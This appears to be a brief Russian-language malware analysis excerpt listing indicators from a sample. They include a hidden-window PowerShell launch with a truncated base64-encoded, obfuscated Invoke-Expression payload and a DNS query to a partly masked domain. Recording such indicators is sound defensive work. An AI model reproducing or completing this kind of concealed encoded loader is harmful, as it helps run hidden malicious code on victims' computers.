Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e SQBOAHYAbwBLAEUALQBlAHgAUABSAGUAcwBTAEkATwBOACgAIAAoACgAIgB7ADUAMwB9AHsAMwA3AH0AewA2ADIAfQB7ADEAMAA1AH0AewA4ADAAfQB7ADYAOAB9AHsAMQAxADIAfQB7ADkANgB9AHsANwA5AH0AewA0ADUAfQ...
- DNS ASK we####ddqw981.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e SQBOAHYAbwBLAEUALQBlAHgAUABSAGUAcwBTAEkATwBOACgAIAAoACgAIgB7ADUAMwB9AHsAMwA3AH0AewA2ADIAfQB7ADEAMAA1AH0AewA4ADAAfQB7ADYAOAB9AHsAMQAxADIAfQB7ADkANgB9AHsANwA5AH0AewA0ADUAfQ...' (со скрытым окном)